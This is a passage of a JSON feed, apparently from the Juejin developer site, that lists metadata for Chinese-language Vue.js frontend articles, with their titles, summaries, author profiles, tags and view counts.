"https://sf3-ttcdn-tos.pstatp.com/img/user-avatar/91365cb95beff6eb7dfdcae5c627cc2e~300x300.image", "level": 1, "description": "", "followee_count": 13, "follower_count": 1, "post_article_count": 12, "digg_article_count": 54, "got_digg_count": 11, "got_view_count": 743, "post_shortmsg_count": 0, "digg_shortmsg_count": 0, "isfollowed": false, "favorable_author": 0, "power": 18, "study_point": 0, "university": {"university_id": "0", "name": "", "logo": ""}, "major": {"major_id": "0", "parent_id": "0", 
"name": ""}, "student_status": 0, "select_event_count": 0, "select_online_course_count": 0, "identity": 0, "is_select_annual": false, "select_annual_rank": 0, "annual_list_type": 0, "extraMap": {}, "is_logout": 0}, "category": {"category_id": "6809637767543259144", "category_name": "前端", "category_url": "frontend", "rank": 2, "back_ground": "https://lc-mhke0kuv.cn-n1.lcfile.com/8c95587526f346c0.png", "icon": "https://lc-mhke0kuv.cn-n1.lcfile.com/1c40f5eaba561e32.png", "ctime": 1457483942, "mtime": 1432503190, "show_type": 3, "item_type": 2, "promote_tag_cap": 4, "promote_priority": 2}, "tags": [{"id": 2546498, "tag_id": "6809640369764958215", "tag_name": "Vue.js", "color": "#41B883", "icon": "https://p1-jj.byteimg.com/tos-cn-i-t2oaga2asx/leancloud-assets/7b5c3eb591b671749fee.png~tplv-t2oaga2asx-image.image", "back_ground": "", "show_navi": 0, "ctime": 1432234520, "mtime": 1631693194, "id_type": 9, "tag_alias": "", "post_article_count": 31257, "concern_user_count": 313520}], "user_interact": {"id": 6919726191666528263, "omitempty": 2, "user_id": 0, "is_digg": false, "is_follow": false, "is_collect": false}, "org": {"org_info": null, "org_user": null, "is_followed": false}, "req_id": "20210915160833010212150040390020BC"}, {"article_id": "6844904117924691982", "article_info": {"article_id": "6844904117924691982", "user_id": "1873223544998494", "category_id": "6809637767543259144", "tag_ids": [6809640369764958215], "visible_level": 0, "link_url": "https://juejin.im/post/6844904117924691982", "cover_image": "https://p1-jj.byteimg.com/tos-cn-i-t2oaga2asx/gold-user-assets/2020/4/8/171587b960059db9~tplv-t2oaga2asx-image.image", "is_gfw": 0, "title": "60行代码 | Proxy实现一个数据驱动简易DEMO", "brief_content": "运行截图本文能做的带你了解一下Proxy的使用了解通过插值表达式怎么实现简易版的数据驱动代码仅是简单Demo,参考了50行代码的MVVM,感受闭包的艺术,一篇好文章,因为时间,沉底了,掏出来再学习一下", "is_english": 0, "is_original": 1, "user_index": 2.9826908456339, "original_type": 0, "original_author": "", "content": "", "ctime": "1586327094", "mtime": "1606695649", 
"rtime": "1586328125", "draft_id": "6845076717090897928", "view_count": 345, "collect_count": 9, "digg_count": 7, "comment_count": 1, "hot_index": 25, "is_hot": 0, "rank_index": 0.00013083, "status": 2, "verify_status": 1, "audit_status": 2, "mark_content": ""}, "author_user_info": {"user_id": "1873223544998494", "user_name": "独立开发者丨磊子", "company": "知乎", "job_title": "前端", "avatar_large": "https://sf3-ttcdn-tos.pstatp.com/img/user-avatar/03b00ce0554959d981f62f186824c323~300x300.image", "level": 2, "description": "", "followee_count": 21, "follower_count": 248, "post_article_count": 22, "digg_article_count": 181, "got_digg_count": 210, "got_view_count": 25205, "post_shortmsg_count": 15, "digg_shortmsg_count": 15, "isfollowed": false, "favorable_author": 0, "power": 462, "study_point": 0, "university": {"university_id": "0", "name": "", "logo": ""}, "major": {"major_id": "0", "parent_id": "0", "name": ""}, "student_status": 0, "select_event_count": 0, "select_online_course_count": 0, "identity": 0, "is_select_annual": false, "select_annual_rank": 0, "annual_list_type": 0, "extraMap": {}, "is_logout": 0}, "category": {"category_id": "6809637767543259144", "category_name": "前端", "category_url": "frontend", "rank": 2, "back_ground": "https://lc-mhke0kuv.cn-n1.lcfile.com/8c95587526f346c0.png", "icon": "https://lc-mhke0kuv.cn-n1.lcfile.com/1c40f5eaba561e32.png", "ctime": 1457483942, "mtime": 1432503190, "show_type": 3, "item_type": 2, "promote_tag_cap": 4, "promote_priority": 2}, "tags": [{"id": 2546498, "tag_id": "6809640369764958215", "tag_name": "Vue.js", "color": "#41B883", "icon": "https://p1-jj.byteimg.com/tos-cn-i-t2oaga2asx/leancloud-assets/7b5c3eb591b671749fee.png~tplv-t2oaga2asx-image.image", "back_ground": "", "show_navi": 0, "ctime": 1432234520, "mtime": 1631693194, "id_type": 9, "tag_alias": "", "post_article_count": 31257, "concern_user_count": 313520}], "user_interact": {"id": 6844904117924691982, "omitempty": 2, "user_id": 0, "is_digg": false, "is_follow": 
false, "is_collect": false}, "org": {"org_info": null, "org_user": null, "is_followed": false}, "req_id": "20210915160833010212150040390020BC"}, {"article_id": "6844904100811767822", "article_info": {"article_id": "6844904100811767822", "user_id": "3227821870160286", "category_id": "6809637767543259144", "tag_ids": [6809640369764958215], "visible_level": 0, "link_url": "https://juejin.im/post/6844904100811767822", "cover_image": "", "is_gfw": 0, "title": "剖析Vue实现原理 - 如何实现双向绑定mvvm", "brief_content": "目前几种主流的mvc(vm)框架都实现了单向数据绑定,而我所理解的双向数据绑定无非就是在单向绑定的基础上给可输入元素(input、textare等)添加了change(input)事件,来动态修改model和 view,并没有多高深。所以无需太过介怀是实现的单向或双向绑定。 D…", "is_english": 0, "is_original": 1, "user_index": 0.038273012061283, "original_type": 0, "original_author": "", "content": "", "ctime": "1584971505", "mtime": "1598861532", "rtime": "1585018357", "draft_id": "6845076693619572743", "view_count": 494, "collect_count": 13, "digg_count": 5, "comment_count": 0, "hot_index": 29, "is_hot": 0, "rank_index": 0.00013083, "status": 2, "verify_status": 1, "audit_status": 2, "mark_content": ""}, "author_user_info": {"user_id": "3227821870160286", "user_name": "clouding", "company": "", "job_title": "前端", "avatar_large": "https://p1-jj.byteimg.com/tos-cn-i-t2oaga2asx/mirror-assets/168e09bae71b41c7c75~tplv-t2oaga2asx-image.image", "level": 2, "description": "", "followee_count": 7, "follower_count": 9, "post_article_count": 5, "digg_article_count": 75, "got_digg_count": 45, "got_view_count": 27455, "post_shortmsg_count": 1, "digg_shortmsg_count": 4, "isfollowed": false, "favorable_author": 0, "power": 319, "study_point": 0, "university": {"university_id": "0", "name": "", "logo": ""}, "major": {"major_id": "0", "parent_id": "0", "name": ""}, "student_status": 0, "select_event_count": 0, "select_online_course_count": 0, "identity": 0, "is_select_annual": false, "select_annual_rank": 0, "annual_list_type": 0, "extraMap": {}, "is_logout": 0}, "category": {"category_id": "6809637767543259144", 
"category_name": "前端", "category_url": "frontend", "rank": 2, "back_ground": "https://lc-mhke0kuv.cn-n1.lcfile.com/8c95587526f346c0.png", "icon": "https://lc-mhke0kuv.cn-n1.lcfile.com/1c40f5eaba561e32.png", "ctime": 1457483942, "mtime": 1432503190, "show_type": 3, "item_type": 2, "promote_tag_cap": 4, "promote_priority": 2}, "tags": [{"id": 2546498, "tag_id": "6809640369764958215", "tag_name": "Vue.js", "color": "#41B883", "icon": "https://p1-jj.byteimg.com/tos-cn-i-t2oaga2asx/leancloud-assets/7b5c3eb591b671749fee.png~tplv-t2oaga2asx-image.image", "back_ground": "", "show_navi": 0, "ctime": 1432234520, "mtime": 1631693194, "id_type": 9, "tag_alias": "", "post_article_count": 31257, "concern_user_count": 313520}], "user_interact": {"id": 6844904100811767822, "omitempty": 2, "user_id": 0, "is_digg": false, "is_follow": false, "is_collect": false}, "org": {"org_info": null, "org_user": null, "is_followed": false}, "req_id": "20210915160833010212150040390020BC"}, {"article_id": "6844903773878353928", "article_info": {"article_id": "6844903773878353928", "user_id": "3896324938537373", "category_id": "6809637767543259144", "tag_ids": [6809640369764958215], "visible_level": 0, "link_url": "", "cover_image": "", "is_gfw": 0, "title": "Vue知识点", "brief_content": "1. 
vue的生命周期 beforeCreate : el 和 data 并未初始化。是获取不到props或者data中的数据的 created :已经可以访问到之前不能访问的数据,但是这时候组件还没被挂载,所以是看不到的。 mounted:将虚拟DOM渲染为真实DOM,并且渲…", "is_english": 0, "is_original": 1, "user_index": 0, "original_type": 0, "original_author": "", "content": "", "ctime": "1549099983", "mtime": "1623573281", "rtime": "1549102633", "draft_id": "6845076151270899725", "view_count": 979, "collect_count": 16, "digg_count": 13, "comment_count": 0, "hot_index": 61, "is_hot": 0, "rank_index": 0.00013083, "status": 2, "verify_status": 1, "audit_status": 2, "mark_content": ""}, "author_user_info": {"user_id": "3896324938537373", "user_name": "kakayuii", "company": "上海", "job_title": "前端工程师", "avatar_large": "https://p1-jj.byteimg.com/tos-cn-i-t2oaga2asx/mirror-assets/168e08d4506c090dc35~tplv-t2oaga2asx-image.image", "level": 1, "description": "", "followee_count": 56, "follower_count": 12, "post_article_count": 13, "digg_article_count": 22, "got_digg_count": 23, "got_view_count": 4373, "post_shortmsg_count": 1, "digg_shortmsg_count": 3, "isfollowed": false, "favorable_author": 0, "power": 66, "study_point": 0, "university": {"university_id": "0", "name": "", "logo": ""}, "major": {"major_id": "0", "parent_id": "0", "name": ""}, "student_status": 0, "select_event_count": 0, "select_online_course_count": 0, "identity": 0, "is_select_annual": false, "select_annual_rank": 0, "annual_list_type": 0, "extraMap": {}, "is_logout": 0}, "category": {"category_id": "6809637767543259144", "category_name": "前端", "category_url": "frontend", "rank": 2, "back_ground": "https://lc-mhke0kuv.cn-n1.lcfile.com/8c95587526f346c0.png", "icon": "https://lc-mhke0kuv.cn-n1.lcfile.com/1c40f5eaba561e32.png", "ctime": 1457483942, "mtime": 1432503190, "show_type": 3, "item_type": 2, "promote_tag_cap": 4, "promote_priority": 2}, "tags": [{"id": 2546498, "tag_id": "6809640369764958215", "tag_name": "Vue.js", "color": "#41B883", "icon": 
"https://p1-jj.byteimg.com/tos-cn-i-t2oaga2asx/leancloud-assets/7b5c3eb591b671749fee.png~tplv-t2oaga2asx-image.image", "back_ground": "", "show_navi": 0, "ctime": 1432234520, "mtime": 1631693194, "id_type": 9, "tag_alias": "", "post_article_count": 31257, "concern_user_count": 313520}], "user_interact": {"id": 6844903773878353928, "omitempty": 2, "user_id": 0, "is_digg": false, "is_follow": false, "is_collect": false}, "org": {"org_info": null, "org_user": null, "is_followed": false}, "req_id": "20210915160833010212150040390020BC"}, {"article_id": "6844903624137506824", "article_info": {"article_id": "6844903624137506824", "user_id": "1468603263615694", "category_id": "6809637767543259144", "tag_ids": [6809640369764958215, 6809640407484334093, 6809641072508010503], "visible_level": 0, "link_url": "https://juejin.im/post/6844903624137506824", "cover_image": "", "is_gfw": 0, "title": "谈一谈对vue-router的简单理解", "brief_content": "这就是比较简单和比较全的结构了,除去(参数和钩子,后面讲)。 vue-router默认使用的是hash模式,就是在路由跳转的时候,会有很多 #,看起来不太美观,因此我们可以使用 history模式 ,这种模式充分利用了 history.pushStateAPI来完成URL跳转而…", "is_english": 0, "is_original": 1, "user_index": 0, "original_type": 0, "original_author": "", "content": "", "ctime": "1529722072", "mtime": "1598457080", "rtime": "1529976625", "draft_id": "6845075545818923015", "view_count": 1330, "collect_count": 7, "digg_count": 11, "comment_count": 3, "hot_index": 80, "is_hot": 0, "rank_index": 0.00013082, "status": 2, "verify_status": 1, "audit_status": 2, "mark_content": ""}, "author_user_info": {"user_id": "1468603263615694", "user_name": "尤小左", "company": "作坊", "job_title": "低级前端开发工程师", "avatar_large": "https://sf1-ttcdn-tos.pstatp.com/img/user-avatar/b5afc3187387129280c604d06c645c4b~300x300.image", "level": 2, "description": "一个前端", "followee_count": 28, "follower_count": 10, "post_article_count": 8, "digg_article_count": 642, "got_digg_count": 46, "got_view_count": 21498, "post_shortmsg_count": 2, "digg_shortmsg_count": 4, "isfollowed": false, 
"favorable_author": 0, "power": 260, "study_point": 0, "university": {"university_id": "0", "name": "", "logo": ""}, "major": {"major_id": "0", "parent_id": "0", "name": ""}, "student_status": 0, "select_event_count": 0, "select_online_course_count": 0, "identity": 0, "is_select_annual": false, "select_annual_rank": 0, "annual_list_type": 0, "extraMap": {}, "is_logout": 0}, "category": {"category_id": "6809637767543259144", "category_name": "前端", "category_url": "frontend", "rank": 2, "back_ground": "https://lc-mhke0kuv.cn-n1.lcfile.com/8c95587526f346c0.png", "icon": "https://lc-mhke0kuv.cn-n1.lcfile.com/1c40f5eaba561e32.png", "ctime": 1457483942, "mtime": 1432503190, "show_type": 3, "item_type": 2, "promote_tag_cap": 4, "promote_priority": 2}, "tags": [{"id": 2546498, "tag_id": "6809640369764958215", "tag_name": "Vue.js", "color": "#41B883", "icon": "https://p1-jj.byteimg.com/tos-cn-i-t2oaga2asx/leancloud-assets/7b5c3eb591b671749fee.png~tplv-t2oaga2asx-image.image", "back_ground": "", "show_navi": 0, "ctime": 1432234520, "mtime": 1631693194, "id_type": 9, "tag_alias": "", "post_article_count": 31257, "concern_user_count": 313520}, {"id": 2546526, "tag_id": "6809640407484334093", "tag_name": "前端", "color": "#60ADFF", "icon": "https://p1-jj.byteimg.com/tos-cn-i-t2oaga2asx/leancloud-assets/bac28828a49181c34110.png~tplv-t2oaga2asx-image.image", "back_ground": "", "show_navi": 1, "ctime": 1435971546, "mtime": 1631693180, "id_type": 9, "tag_alias": "", "post_article_count": 88830, "concern_user_count": 527705}, {"id": 2547007, "tag_id": "6809641072508010503", "tag_name": "vue-router", "color": "", "icon": "https://p1-jj.byteimg.com/tos-cn-i-t2oaga2asx/gold-ad-assets/14988107830572beb053b0c5bb4c59fb974b1ac7ce8bd.jpg~tplv-t2oaga2asx-image.image", "back_ground": "", "show_navi": 0, "ctime": 1498782020, "mtime": 1631683218, "id_type": 9, "tag_alias": "", "post_article_count": 1074, "concern_user_count": 28589}], "user_interact": {"id": 6844903624137506824, "omitempty": 2, 
"user_id": 0, "is_digg": false, "is_follow": false, "is_collect": false}, "org": {"org_info": null, "org_user": null, "is_followed": false}, "req_id": "20210915160833010212150040390020BC"}, {"article_id": "6906331373406322696", "article_info": {"article_id": "6906331373406322696", "user_id": "2444950350861495", "category_id": "6809637767543259144", "tag_ids": [6809640369764958215], "visible_level": 0, "link_url": "", "cover_image": "https://p3-juejin.byteimg.com/tos-cn-i-k3u1fbpfcp/7364060d7cb54c1f90a2c7f2f5535109~tplv-k3u1fbpfcp-watermark.image", "is_gfw": 0, "title": "桌面与Web的信使:Notification API(附Vue3中使用)", "brief_content": "引言这是在初次进入Facebook的时候Chrome在地址栏弹出的提示👇当你点击了“允许”后,即使你最小化了标签或者切到其他标签去了,朋友发给你的聊天信息也会通过桌面级的通知告诉你,FB还使用了FCM", "is_english": 0, "is_original": 1, "user_index": 0, "original_type": 0, "original_author": "", "content": "", "ctime": "1608005775", "mtime": "1608014531", "rtime": "1608014531", "draft_id": "6906330533001854989", "view_count": 147, "collect_count": 2, "digg_count": 1, "comment_count": 4, "hot_index": 12, "is_hot": 0, "rank_index": 0.00013074, "status": 2, "verify_status": 1, "audit_status": 2, "mark_content": ""}, "author_user_info": {"user_id": "2444950350861495", "user_name": "someCat", "company": "翼果(深圳)科技有限公司", "job_title": "产品&前端开发工程师", "avatar_large": "https://sf6-ttcdn-tos.pstatp.com/img/user-avatar/4a220ec3dee3924c48cf10b71123b42f~300x300.image", "level": 1, "description": "这个人很懒", "followee_count": 0, "follower_count": 0, "post_article_count": 1, "digg_article_count": 0, "got_digg_count": 1, "got_view_count": 147, "post_shortmsg_count": 0, "digg_shortmsg_count": 0, "isfollowed": false, "favorable_author": 0, "power": 2, "study_point": 0, "university": {"university_id": "0", "name": "", "logo": ""}, "major": {"major_id": "0", "parent_id": "0", "name": ""}, "student_status": 0, "select_event_count": 0, "select_online_course_count": 0, "identity": 0, "is_select_annual": false, "select_annual_rank": 0, "annual_list_type": 0, "extraMap": 
{}, "is_logout": 0}, "category": {"category_id": "6809637767543259144", "category_name": "前端", "category_url": "frontend", "rank": 2, "back_ground": "https://lc-mhke0kuv.cn-n1.lcfile.com/8c95587526f346c0.png", "icon": "https://lc-mhke0kuv.cn-n1.lcfile.com/1c40f5eaba561e32.png", "ctime": 1457483942, "mtime": 1432503190, "show_type": 3, "item_type": 2, "promote_tag_cap": 4, "promote_priority": 2}, "tags": [{"id": 2546498, "tag_id": "6809640369764958215", "tag_name": "Vue.js", "color": "#41B883", "icon": "https://p1-jj.byteimg.com/tos-cn-i-t2oaga2asx/leancloud-assets/7b5c3eb591b671749fee.png~tplv-t2oaga2asx-image.image", "back_ground": "", "show_navi": 0, "ctime": 1432234520, "mtime": 1631693194, "id_type": 9, "tag_alias": "", "post_article_count": 31257, "concern_user_count": 313520}], "user_interact": {"id": 6906331373406322696, "omitempty": 2, "user_id": 0, "is_digg": false, "is_follow": false, "is_collect": false}, "org": {"org_info": null, "org_user": null, "is_followed": false}, "req_id": "20210915160833010212150040390020BC"}, {"article_id": "6933236452612374541", "article_info": {"article_id": "6933236452612374541", "user_id": "1802854802139998", "category_id": "6809637767543259144", "tag_ids": [6809640369764958215], "visible_level": 0, "link_url": "", "cover_image": "", "is_gfw": 0, "title": "Router路由-VUE-CLI脚手架-VUE..JS组件", "brief_content": "1. 父传子有哪些方式 2. 子传父有哪些方式 商品为子组件,购物车为父组件,父组件需要统计商品个数,就需要在子组件个数变化时传值给父组件。 3. 如何让 CSS 只在当前组件中起作用 4. keep-alive 的作用是什么 主要用于保留组件状态或避免组件重新渲染。 5. 
v…", "is_english": 0, "is_original": 1, "user_index": 0, "original_type": 0, "original_author": "", "content": "", "ctime": "1614269971", "mtime": "1614312640", "rtime": "1614312640", "draft_id": "6933235835810938888", "view_count": 110, "collect_count": 0, "digg_count": 1, "comment_count": 2, "hot_index": 8, "is_hot": 0, "rank_index": 0.00013036, "status": 2, "verify_status": 1, "audit_status": 2, "mark_content": ""}, "author_user_info": {"user_id": "1802854802139998", "user_name": "往底层挖矿", "company": "贱人发展有限公司", "job_title": "贱黄湿", "avatar_large": "https://sf6-ttcdn-tos.pstatp.com/img/user-avatar/5ddd4bc95d08ba89c24ddf182251ec02~300x300.image", "level": 1, "description": "搞怪,幽默博主", "followee_count": 1, "follower_count": 1, "post_article_count": 15, "digg_article_count": 0, "got_digg_count": 5, "got_view_count": 844, "post_shortmsg_count": 0, "digg_shortmsg_count": 0, "isfollowed": false, "favorable_author": 0, "power": 13, "study_point": 0, "university": {"university_id": "0", "name": "", "logo": ""}, "major": {"major_id": "0", "parent_id": "0", "name": ""}, "student_status": 0, "select_event_count": 0, "select_online_course_count": 0, "identity": 0, "is_select_annual": false, "select_annual_rank": 0, "annual_list_type": 0, "extraMap": {}, "is_logout": 0}, "category": {"category_id": "6809637767543259144", "category_name": "前端", "category_url": "frontend", "rank": 2, "back_ground": "https://lc-mhke0kuv.cn-n1.lcfile.com/8c95587526f346c0.png", "icon": "https://lc-mhke0kuv.cn-n1.lcfile.com/1c40f5eaba561e32.png", "ctime": 1457483942, "mtime": 1432503190, "show_type": 3, "item_type": 2, "promote_tag_cap": 4, "promote_priority": 2}, "tags": [{"id": 2546498, "tag_id": "6809640369764958215", "tag_name": "Vue.js", "color": "#41B883", "icon": "https://p1-jj.byteimg.com/tos-cn-i-t2oaga2asx/leancloud-assets/7b5c3eb591b671749fee.png~tplv-t2oaga2asx-image.image", "back_ground": "", "show_navi": 0, "ctime": 1432234520, "mtime": 1631693194, "id_type": 9, "tag_alias": "", 
"post_article_count": 31257, "concern_user_count": 313520}], "user_interact": {"id": 6933236452612374541, "omitempty": 2, "user_id": 0, "is_digg": false, "is_follow": false, "is_collect": false}, "org": {"org_info": null, "org_user": null, "is_followed": false}, "req_id": "20210915160833010212150040390020BC"}, {"article_id": "6844903551446024205", "article_info": {"article_id": "6844903551446024205", "user_id": "4336129589657245", "category_id": "6809637767543259144", "tag_ids": [6809640369764958215, 6809640407484334093, 6809640406058270733, 6809640403516522504], "visible_level": 0, "link_url": "https://juejin.im/post/6844903551446024205", "cover_image": "", "is_gfw": 0, "title": "自己动手写一个 SimpleVue", "brief_content": "双向绑定是 MVVM 框架最核心之处,那么双向绑定的核心是什么呢?核心就是 Object.defineProperty 这个 API,关于这个 API 的具体内容,请移步 MDN - Object.defineProperty ,里面有更详细的说明。 监听者(Observer)…", "is_english": 0, "is_original": 1, "user_index": 0, "original_type": 0, "original_author": "", "content": "", "ctime": "1516160165", "mtime": "1599393208", "rtime": "1516160165", "draft_id": "6845075367447773191", "view_count": 1040, "collect_count": 25, "digg_count": 42, "comment_count": 0, "hot_index": 94, "is_hot": 0, "rank_index": 0.0001303, "status": 2, "verify_status": 1, "audit_status": 2, "mark_content": ""}, "author_user_info": {"user_id": "4336129589657245", "user_name": "小烜同学", "company": "知道创宇", "job_title": "搬砖工程师", "avatar_large": "https://sf3-ttcdn-tos.pstatp.com/img/user-avatar/35270877735321ea14d176693c2c99af~300x300.image", "level": 3, "description": "天衣无缝的秘密是: 做技术,你开心吗?", "followee_count": 20, "follower_count": 487, "post_article_count": 23, "digg_article_count": 244, "got_digg_count": 1462, "got_view_count": 79358, "post_shortmsg_count": 0, "digg_shortmsg_count": 3, "isfollowed": false, "favorable_author": 0, "power": 2204, "study_point": 0, "university": {"university_id": "0", "name": "", "logo": ""}, "major": {"major_id": "0", "parent_id": "0", "name": ""}, "student_status": 0, 
"select_event_count": 0, "select_online_course_count": 0, "identity": 0, "is_select_annual": false, "select_annual_rank": 0, "annual_list_type": 0, "extraMap": {}, "is_logout": 0}, "category": {"category_id": "6809637767543259144", "category_name": "前端", "category_url": "frontend", "rank": 2, "back_ground": "https://lc-mhke0kuv.cn-n1.lcfile.com/8c95587526f346c0.png", "icon": "https://lc-mhke0kuv.cn-n1.lcfile.com/1c40f5eaba561e32.png", "ctime": 1457483942, "mtime": 1432503190, "show_type": 3, "item_type": 2, "promote_tag_cap": 4, "promote_priority": 2}, "tags": [{"id": 2546498, "tag_id": "6809640369764958215", "tag_name": "Vue.js", "color": "#41B883", "icon": "https://p1-jj.byteimg.com/tos-cn-i-t2oaga2asx/leancloud-assets/7b5c3eb591b671749fee.png~tplv-t2oaga2asx-image.image", "back_ground": "", "show_navi": 0, "ctime": 1432234520, "mtime": 1631693194, "id_type": 9, "tag_alias": "", "post_article_count": 31257, "concern_user_count": 313520}, {"id": 2546526, "tag_id": "6809640407484334093", "tag_name": "前端", "color": "#60ADFF", "icon": "https://p1-jj.byteimg.com/tos-cn-i-t2oaga2asx/leancloud-assets/bac28828a49181c34110.png~tplv-t2oaga2asx-image.image", "back_ground": "", "show_navi": 1, "ctime": 1435971546, "mtime": 1631693180, "id_type": 9, "tag_alias": "", "post_article_count": 88830, "concern_user_count": 527705}, {"id": 2546525, "tag_id": "6809640406058270733", "tag_name": "设计", "color": "#F56868", "icon": "https://p1-jj.byteimg.com/tos-cn-i-t2oaga2asx/leancloud-assets/f2e3a6fceb1a4f1ce6b6.png~tplv-t2oaga2asx-image.image", "back_ground": "", "show_navi": 1, "ctime": 1435971510, "mtime": 1631689661, "id_type": 9, "tag_alias": "", "post_article_count": 6064, "concern_user_count": 218547}, {"id": 2546523, "tag_id": "6809640403516522504", "tag_name": "API", "color": "#616161", "icon": "https://p1-jj.byteimg.com/tos-cn-i-t2oaga2asx/leancloud-assets/a7c8e10a9c742fc175f9.png~tplv-t2oaga2asx-image.image", "back_ground": "", "show_navi": 0, "ctime": 1435971240, "mtime": 
1631683137, "id_type": 9, "tag_alias": "", "post_article_count": 7154, "concern_user_count": 88261}], "user_interact": {"id": 6844903551446024205, "omitempty": 2, "user_id": 0, "is_digg": false, "is_follow": false, "is_collect": false}, "org": {"org_info": null, "org_user": null, "is_followed": false}, "req_id": "20210915160833010212150040390020BC"}, {"article_id": "6844903981861306376", "article_info": {"article_id": "6844903981861306376", "user_id": "360295544138669", "category_id": "6809637767543259144", "tag_ids": [6809640369764958215], "visible_level": 0, "link_url": "https://juejin.im/post/6844903981861306376", "cover_image": "", "is_gfw": 0, "title": "Vue3.0数据响应系统分析(主要针对于reactive)", "brief_content": "Vue3.0与Vue2.x的数据响应机制Vue3.0采用了ES6的Proxy来进行数据监听优点:缺点:源码导读在分析源码之前,我们需要得知几个变量先:首先我们来看一下reactive函数首先我们检测了", "is_english": 0, "is_original": 1, "user_index": 3.5350891055048, "original_type": 0, "original_author": "", "content": "", "ctime": "1572225338", "mtime": "1598531145", "rtime": "1572251543", "draft_id": "6845076510903107591", "view_count": 686, "collect_count": 2, "digg_count": 2, "comment_count": 0, "hot_index": 36, "is_hot": 0, "rank_index": 0.00013006, "status": 2, "verify_status": 1, "audit_status": 2, "mark_content": ""}, "author_user_info": {"user_id": "360295544138669", "user_name": "我在曾经眺望彼岸", "company": "网易", "job_title": "前端", "avatar_large": "https://sf1-ttcdn-tos.pstatp.com/img/user-avatar/02103eca95c16c56d25565ae3755e008~300x300.image", "level": 2, "description": "喜欢扶老奶奶过马路", "followee_count": 4, "follower_count": 53, "post_article_count": 26, "digg_article_count": 156, "got_digg_count": 250, "got_view_count": 22491, "post_shortmsg_count": 10, "digg_shortmsg_count": 2, "isfollowed": false, "favorable_author": 0, "power": 477, "study_point": 0, "university": {"university_id": "0", "name": "", "logo": ""}, "major": {"major_id": "0", "parent_id": "0", "name": ""}, "student_status": 0, "select_event_count": 0, "select_online_course_count": 0, 
"identity": 0, "is_select_annual": false, "select_annual_rank": 0, "annual_list_type": 0, "extraMap": {}, "is_logout": 0}, "category": {"category_id": "6809637767543259144", "category_name": "前端", "category_url": "frontend", "rank": 2, "back_ground": "https://lc-mhke0kuv.cn-n1.lcfile.com/8c95587526f346c0.png", "icon": "https://lc-mhke0kuv.cn-n1.lcfile.com/1c40f5eaba561e32.png", "ctime": 1457483942, "mtime": 1432503190, "show_type": 3, "item_type": 2, "promote_tag_cap": 4, "promote_priority": 2}, "tags": [{"id": 2546498, "tag_id": "6809640369764958215", "tag_name": "Vue.js", "color": "#41B883", "icon": "https://p1-jj.byteimg.com/tos-cn-i-t2oaga2asx/leancloud-assets/7b5c3eb591b671749fee.png~tplv-t2oaga2asx-image.image", "back_ground": "", "show_navi": 0, "ctime": 1432234520, "mtime": 1631693194, "id_type": 9, "tag_alias": "", "post_article_count": 31257, "concern_user_count": 313520}], "user_interact": {"id": 6844903981861306376, "omitempty": 2, "user_id": 0, "is_digg": false, "is_follow": false, "is_collect": false}, "org": {"org_info": null, "org_user": null, "is_followed": false}, "req_id": "20210915160833010212150040390020BC"}, {"article_id": "6844903577224216590", "article_info": {"article_id": "6844903577224216590", "user_id": "1046390798826654", "category_id": "6809637767543259144", "tag_ids": [6809640369764958215, 6809640407484334093, 6809640398105870343], "visible_level": 0, "link_url": "https://juejin.im/post/6844903577224216590", "cover_image": "", "is_gfw": 0, "title": "【翻译】Vue.js中的computed是如何工作的", "brief_content": "这篇文章,我们通过实现一个简单版的和Vue中computed具有相同功能的函数来了解computed是如何工作的。 尽管person.age看起来像是访问了对象的一个属性,但其实在内部我们是运行了一个函数。 有趣的是,25和‘Brazil’还是一个闭包内部的变量,只有当赋给它们…", "is_english": 0, "is_original": 1, "user_index": 0, "original_type": 0, "original_author": "", "content": "", "ctime": "1521361901", "mtime": "1598449201", "rtime": "1521543036", "draft_id": "6845075395876749326", "view_count": 1182, "collect_count": 11, "digg_count": 28, "comment_count": 1, 
"hot_index": 88, "is_hot": 0, "rank_index": 0.00012979, "status": 2, "verify_status": 1, "audit_status": 2, "mark_content": ""}, "author_user_info": {"user_id": "1046390798826654", "user_name": "陈杰夫", "company": "", "job_title": "前端工程师", "avatar_large": "https://sf6-ttcdn-tos.pstatp.com/img/user-avatar/9fe7e7130263b378326a81fe97f181bc~300x300.image", "level": 3, "description": "rua", "followee_count": 14, "follower_count": 55, "post_article_count": 18, "digg_article_count": 182, "got_digg_count": 801, "got_view_count": 33910, "post_shortmsg_count": 1, "digg_shortmsg_count": 5, "isfollowed": false, "favorable_author": 0, "power": 1139, "study_point": 0, "university": {"university_id": "0", "name": "", "logo": ""}, "major": {"major_id": "0", "parent_id": "0", "name": ""}, "student_status": 0, "select_event_count": 0, "select_online_course_count": 0, "identity": 0, "is_select_annual": false, "select_annual_rank": 0, "annual_list_type": 0, "extraMap": {}, "is_logout": 0}, "category": {"category_id": "6809637767543259144", "category_name": "前端", "category_url": "frontend", "rank": 2, "back_ground": "https://lc-mhke0kuv.cn-n1.lcfile.com/8c95587526f346c0.png", "icon": "https://lc-mhke0kuv.cn-n1.lcfile.com/1c40f5eaba561e32.png", "ctime": 1457483942, "mtime": 1432503190, "show_type": 3, "item_type": 2, "promote_tag_cap": 4, "promote_priority": 2}, "tags": [{"id": 2546498, "tag_id": "6809640369764958215", "tag_name": "Vue.js", "color": "#41B883", "icon": "https://p1-jj.byteimg.com/tos-cn-i-t2oaga2asx/leancloud-assets/7b5c3eb591b671749fee.png~tplv-t2oaga2asx-image.image", "back_ground": "", "show_navi": 0, "ctime": 1432234520, "mtime": 1631693194, "id_type": 9, "tag_alias": "", "post_article_count": 31257, "concern_user_count": 313520}, {"id": 2546526, "tag_id": "6809640407484334093", "tag_name": "前端", "color": "#60ADFF", "icon": "https://p1-jj.byteimg.com/tos-cn-i-t2oaga2asx/leancloud-assets/bac28828a49181c34110.png~tplv-t2oaga2asx-image.image", "back_ground": "", 
